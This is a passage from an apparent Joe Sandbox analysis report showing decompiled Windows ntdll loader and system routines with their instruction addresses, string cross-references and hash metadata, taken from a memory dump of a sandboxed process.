															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00AB61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00B59D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00A9FFB0(_t118, _t156, 0xb786cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00AC9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                    0x00a98799
                                                    0x00a9879d
                                                    0x00a987a1
                                                    0x00a987a3
                                                    0x00a987a8
                                                    0x00a987c3
                                                    0x00a987c3
                                                    0x00a987c8
                                                    0x00a987d1
                                                    0x00a987d4
                                                    0x00a987d8
                                                    0x00a987e5
                                                    0x00a987ec
                                                    0x00ae9bfe
                                                    0x00ae9c00
                                                    0x00ae9c02
                                                    0x00ae9c08
                                                    0x00ae9c0d
                                                    0x00ae9c0f
                                                    0x00ae9c14
                                                    0x00ae9c2d
                                                    0x00ae9c32
                                                    0x00ae9c37
                                                    0x00ae9c3a
                                                    0x00ae9c3c
                                                    0x00ae9c42
                                                    0x00ae9c42
                                                    0x00ae9c3c
                                                    0x00ae9c02
                                                    0x00a987da
                                                    0x00a987df
                                                    0x00a987e3
                                                    0x00000000
                                                    0x00000000
                                                    0x00a987e3
                                                    0x00a987f2
                                                    0x00000000
                                                    0x00a987fb
                                                    0x00a987fd
                                                    0x00a987fe
                                                    0x00a9880e
                                                    0x00a9880f
                                                    0x00a98810
                                                    0x00a98814
                                                    0x00a9881a
                                                    0x00a9881c
                                                    0x00a9881f
                                                    0x00a98821
                                                    0x00a98822
                                                    0x00a98824
                                                    0x00a98826
                                                    0x00a9882c
                                                    0x00a9882e
                                                    0x00ae9c48
                                                    0x00ae9c48
                                                    0x00a98834
                                                    0x00a98834
                                                    0x00a98837
                                                    0x00000000
                                                    0x00000000
                                                    0x00a98837
                                                    0x00a9882e
                                                    0x00a9883d
                                                    0x00a98840
                                                    0x00a98843
                                                    0x00a98846
                                                    0x00a98849
                                                    0x00a9884c
                                                    0x00a9884e
                                                    0x00a98850
                                                    0x00a98852
                                                    0x00a98854
                                                    0x00a98857
                                                    0x00a988b4
                                                    0x00a988b6
                                                    0x00a988b6
                                                    0x00a98859
                                                    0x00a98859
                                                    0x00a98859
                                                    0x00a98861
                                                    0x00a98866
                                                    0x00a9886a
                                                    0x00a9893d
                                                    0x00a98941
                                                    0x00000000
                                                    0x00a98947
                                                    0x00a98947
                                                    0x00a9894a
                                                    0x00a9894c
                                                    0x00000000
                                                    0x00a98952
                                                    0x00a98955
                                                    0x00a9895a
                                                    0x00a9895d
                                                    0x00a9895d
                                                    0x00a9895f
                                                    0x00a98961
                                                    0x00a98961
                                                    0x00a98968
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9896a
                                                    0x00a9896b
                                                    0x00a9896e
                                                    0x00000000
                                                    0x00a98970
                                                    0x00a98970
                                                    0x00a98970
                                                    0x00a98970
                                                    0x00a98972
                                                    0x00a98972
                                                    0x00a98974
                                                    0x00000000
                                                    0x00a9897a
                                                    0x00a9897a
                                                    0x00a9897d
                                                    0x00000000
                                                    0x00a98983
                                                    0x00ae9c65
                                                    0x00ae9c6d
                                                    0x00ae9c72
                                                    0x00ae9c75
                                                    0x00ae9c75
                                                    0x00ae9c82
                                                    0x00ae9c86
                                                    0x00ae9c87
                                                    0x00ae9c88
                                                    0x00ae9c89
                                                    0x00ae9c8c
                                                    0x00ae9c90
                                                    0x00ae9c95
                                                    0x00ae9c97
                                                    0x00ae9ca0
                                                    0x00ae9ca3
                                                    0x00ae9ca9
                                                    0x00ae9ca9
                                                    0x00000000
                                                    0x00ae9ca9
                                                    0x00ae9ca3
                                                    0x00000000
                                                    0x00ae9c97
                                                    0x00a9897d
                                                    0x00000000
                                                    0x00a98974
                                                    0x00a98988
                                                    0x00a98992
                                                    0x00a98996
                                                    0x00000000
                                                    0x00a98996
                                                    0x00a9894c
                                                    0x00000000
                                                    0x00a98870
                                                    0x00a9887b
                                                    0x00a9887d
                                                    0x00a9887f
                                                    0x00a98881
                                                    0x00a98884
                                                    0x00a98884
                                                    0x00a98886
                                                    0x00a98889
                                                    0x00a9888c
                                                    0x00a9888e
                                                    0x00a98891
                                                    0x00a98891
                                                    0x00a98898
                                                    0x00000000
                                                    0x00000000
                                                    0x00a9889a
                                                    0x00a9889b
                                                    0x00a9889e
                                                    0x00000000
                                                    0x00000000
                                                    0x00a988a0
                                                    0x00a988a8
                                                    0x00a988b0
                                                    0x00a988b2
                                                    0x00a988d3
                                                    0x00a988d5
                                                    0x00000000
                                                    0x00a988d7
                                                    0x00a988db
                                                    0x00a988dc
                                                    0x00a988e0
                                                    0x00a988e8
                                                    0x00a988ee
                                                    0x00a988f0
                                                    0x00a988f3
                                                    0x00a988fc
                                                    0x00a98901
                                                    0x00a98906
                                                    0x00a9890c
                                                    0x00a9890c
                                                    0x00a9890f
                                                    0x00a98916
                                                    0x00a98917
                                                    0x00a98918
                                                    0x00a98919
                                                    0x00a9891a
                                                    0x00a9891f
                                                    0x00a98921
                                                    0x00ae9c52
                                                    0x00ae9c55
                                                    0x00ae9c5b
                                                    0x00ae9cac
                                                    0x00ae9cc0
                                                    0x00ae9cc0
                                                    0x00ae9c55
                                                    0x00a98927
                                                    0x00a98927
                                                    0x00a9892f
                                                    0x00a98933
                                                    0x00000000
                                                    0x00a988f5
                                                    0x00a988f5
                                                    0x00000000
                                                    0x00a988f7
                                                    0x00a988f7
                                                    0x00a988fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a988fa
                                                    0x00a988f5
                                                    0x00a988f3
                                                    0x00000000
                                                    0x00a988d5
                                                    0x00000000
                                                    0x00a988b2
                                                    0x00a988c9
                                                    0x00000000
                                                    0x00a988c9
                                                    0x00a9887f
                                                    0x00a9886a
                                                    0x00a98857
                                                    0x00a98852
                                                    0x00a988bf
                                                    0x00a988bf
                                                    0x00a987aa
                                                    0x00a987ad
                                                    0x00a987ae
                                                    0x00a987b4
                                                    0x00a987b5
                                                    0x00a987b6
                                                    0x00a987b8
                                                    0x00a987bd
                                                    0x00a987c1
                                                    0x00a987f4
                                                    0x00a987fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a987c1
                                                    0x00000000

                                                    Strings
                                                    • LdrpDoPostSnapWork, xrefs: 00AE9C1E
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00AE9C28
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00AE9C18
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 2994545307-1948996284
                                                    • Opcode ID: 042724572164d50f1cbf31e9745c73b57806dcea21a7ba3086e272d8de17d3b8
                                                    • Instruction ID: 2b9f2daad55f4b92be7682ca984828ca230185f6418118d9f2723ace291700e3
                                                    • Opcode Fuzzy Hash: 042724572164d50f1cbf31e9745c73b57806dcea21a7ba3086e272d8de17d3b8
                                                    • Instruction Fuzzy Hash: BC91D171B00216AFDF18DF59C881ABAB7F5FF46350B648169E805AB251DF34ED41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A97E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E00A97E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00A9CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00A8C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xb75780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00B05510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xb75780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00AA7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AA7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00B07016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00AA7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AA7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00B07016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00ABA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00A8B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                    0x00a97e4c
                                                    0x00a97e50
                                                    0x00a97e55
                                                    0x00a97e58
                                                    0x00a97e5d
                                                    0x00a97e71
                                                    0x00a97f33
                                                    0x00a97e77
                                                    0x00a97e77
                                                    0x00a97e79
                                                    0x00a97e79
                                                    0x00a97e7e
                                                    0x00a97f45
                                                    0x00ae9848
                                                    0x00000000
                                                    0x00ae9848
                                                    0x00a97f4e
                                                    0x00a97f53
                                                    0x00a97f5a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae985a
                                                    0x00ae9862
                                                    0x00ae9866
                                                    0x00000000
                                                    0x00ae986c
                                                    0x00000000
                                                    0x00ae986c
                                                    0x00a97e84
                                                    0x00a97e84
                                                    0x00a97e8d
                                                    0x00ae9871
                                                    0x00a97eb8
                                                    0x00a97ec0
                                                    0x00a97ec0
                                                    0x00a97e9a
                                                    0x00ae987e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae9884
                                                    0x00ae988b
                                                    0x00ae98a7
                                                    0x00ae98ac
                                                    0x00ae98b1
                                                    0x00ae98b6
                                                    0x00ae98b8
                                                    0x00ae98b8
                                                    0x00ae98b9
                                                    0x00000000
                                                    0x00ae98b9
                                                    0x00a97ea0
                                                    0x00a97ea7
                                                    0x00000000
                                                    0x00000000
                                                    0x00a97eac
                                                    0x00a97eb1
                                                    0x00a97ec6
                                                    0x00a97ed0
                                                    0x00ae98cc
                                                    0x00a97ed6
                                                    0x00a97ed6
                                                    0x00a97ed6
                                                    0x00a97ede
                                                    0x00a97ee3
                                                    0x00ae98e3
                                                    0x00ae98f0
                                                    0x00ae9902
                                                    0x00ae98f2
                                                    0x00ae98fb
                                                    0x00ae98fb
                                                    0x00ae9907
                                                    0x00ae991d
                                                    0x00ae991d
                                                    0x00ae9907
                                                    0x00ae98e3
                                                    0x00a97ef0
                                                    0x00a97f14
                                                    0x00a97f14
                                                    0x00a97f1e
                                                    0x00ae9946
                                                    0x00a97f24
                                                    0x00a97f24
                                                    0x00a97f24
                                                    0x00a97f2c
                                                    0x00ae996a
                                                    0x00ae9975
                                                    0x00ae9975
                                                    0x00ae997e
                                                    0x00ae9993
                                                    0x00ae9993
                                                    0x00ae997e
                                                    0x00000000
                                                    0x00a97ef2
                                                    0x00a97efc
                                                    0x00a97f0a
                                                    0x00a97f0e
                                                    0x00ae9933
                                                    0x00000000
                                                    0x00ae9933
                                                    0x00000000
                                                    0x00a97f0e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a97eb1

                                                    Strings
                                                    • LdrpCompleteMapModule, xrefs: 00AE9898
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 00AE9891
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 00AE98A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 479881d7b34b312e1f9c54a644914ae7fdf72068e7309bcad3752fe5b90e8ed5
                                                    • Instruction ID: c20613253e39df8962ef550d304dfb2407b67aeac8ef6441f120fd64ccdeef69
                                                    • Opcode Fuzzy Hash: 479881d7b34b312e1f9c54a644914ae7fdf72068e7309bcad3752fe5b90e8ed5
                                                    • Instruction Fuzzy Hash: E251F031B187859BDB26CB69C944B6EBBF4AF01710F1406A9E8519B7E2D770ED00CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E00A8E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A8F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00AC95D0();
						}
						if(_t78 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00ACFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00ACBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00AC9600();
					if(_t97 < 0) {
						goto L6;
					}
					E00ACBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A8F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00ACBB40(_t83, _t102 + 0x24, _t78);
								if(L00A943C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00ACBB40(_t84, _t102 + 0x24, _t94);
									if(L00A943C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                    0x00a8e620
                                                    0x00a8e628
                                                    0x00a8e62f
                                                    0x00a8e631
                                                    0x00a8e635
                                                    0x00a8e637
                                                    0x00a8e63e
                                                    0x00ae5503
                                                    0x00ae5503
                                                    0x00a8e64c
                                                    0x00a8e64c
                                                    0x00a8e651
                                                    0x00000000
                                                    0x00000000
                                                    0x00a8e661
                                                    0x00a8e665
                                                    0x00ae542a
                                                    0x00a8e715
                                                    0x00a8e71a
                                                    0x00a8e71c
                                                    0x00a8e720
                                                    0x00a8e720
                                                    0x00a8e727
                                                    0x00a8e736
                                                    0x00a8e736
                                                    0x00a8e743
                                                    0x00a8e743
                                                    0x00a8e673
                                                    0x00a8e678
                                                    0x00a8e67d
                                                    0x00a8e682
                                                    0x00a8e685
                                                    0x00a8e692
                                                    0x00a8e69b
                                                    0x00a8e6a3
                                                    0x00a8e6ad
                                                    0x00a8e6b1
                                                    0x00a8e6b2
                                                    0x00a8e6bb
                                                    0x00a8e6bf
                                                    0x00a8e6c0
                                                    0x00a8e6c8
                                                    0x00a8e6cc
                                                    0x00a8e6d5
                                                    0x00a8e6d9
                                                    0x00000000
                                                    0x00000000
                                                    0x00a8e6e5
                                                    0x00a8e6ea
                                                    0x00a8e6f9
                                                    0x00a8e70b
                                                    0x00a8e70f
                                                    0x00ae5439
                                                    0x00ae545e
                                                    0x00ae545e
                                                    0x00000000
                                                    0x00ae545e
                                                    0x00ae543b
                                                    0x00ae543e
                                                    0x00ae5440
                                                    0x00ae5445
                                                    0x00ae5472
                                                    0x00ae5475
                                                    0x00ae548d
                                                    0x00ae5493
                                                    0x00ae54a9
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae54ab
                                                    0x00ae54b4
                                                    0x00ae54bc
                                                    0x00ae54c8
                                                    0x00ae54de
                                                    0x00ae54fb
                                                    0x00ae54e0
                                                    0x00ae54e6
                                                    0x00ae54eb
                                                    0x00ae54eb
                                                    0x00ae54de
                                                    0x00000000
                                                    0x00ae54bc
                                                    0x00ae5477
                                                    0x00ae547a
                                                    0x00ae5480
                                                    0x00ae5483
                                                    0x00ae5486
                                                    0x00ae548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae548b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae5447
                                                    0x00ae5447
                                                    0x00ae5447
                                                    0x00ae5447
                                                    0x00ae544e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae5450
                                                    0x00ae5452
                                                    0x00ae5455
                                                    0x00ae545a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae545c
                                                    0x00ae546a
                                                    0x00ae546d
                                                    0x00ae546f
                                                    0x00000000
                                                    0x00ae546f
                                                    0x00a8e70f

                                                    Strings
                                                    • @, xrefs: 00A8E6C0
                                                    • InstallLanguageFallback, xrefs: 00A8E6DB
                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A8E68C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                    • API String ID: 0-1757540487
                                                    • Opcode ID: d26a600671cb330c3444b46361e8f7333366b5a9dd6fed5557f5589c5f85875a
                                                    • Instruction ID: 6e486bcb970ecbc3a1b5226de8322daaac1865700c24af77bafb4a2b90b07e60
                                                    • Opcode Fuzzy Hash: d26a600671cb330c3444b46361e8f7333366b5a9dd6fed5557f5589c5f85875a
                                                    • Instruction Fuzzy Hash: 6B518E769083859BC714EF65D440AABB3E9BF88718F05092EF985D7280FB34DD44C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B051BE Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 77%
                                                    			E00B051BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xb605f0);
				E00ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00B053CA(0);
						return E00ADD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E00ACF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E00AA3690(1, _t117, 0xa61810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E00ACAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L00AA4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E00ACAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00B0500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E00AC9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                    0x00b051be
                                                    0x00b051c3
                                                    0x00b051c8
                                                    0x00b051cd
                                                    0x00b051d0
                                                    0x00b051d3
                                                    0x00b051d8
                                                    0x00b051db
                                                    0x00b051de
                                                    0x00b051e0
                                                    0x00b051e3
                                                    0x00b051e6
                                                    0x00b051e8
                                                    0x00b05342
                                                    0x00b05351
                                                    0x00b05356
                                                    0x00b0535a
                                                    0x00b05360
                                                    0x00b05363
                                                    0x00b05366
                                                    0x00b05369
                                                    0x00b05369
                                                    0x00b0536b
                                                    0x00b0536b
                                                    0x00b05370
                                                    0x00b053a3
                                                    0x00b053a4
                                                    0x00b053a6
                                                    0x00b053ab
                                                    0x00b053ab
                                                    0x00b053ae
                                                    0x00b053ae
                                                    0x00b053b5
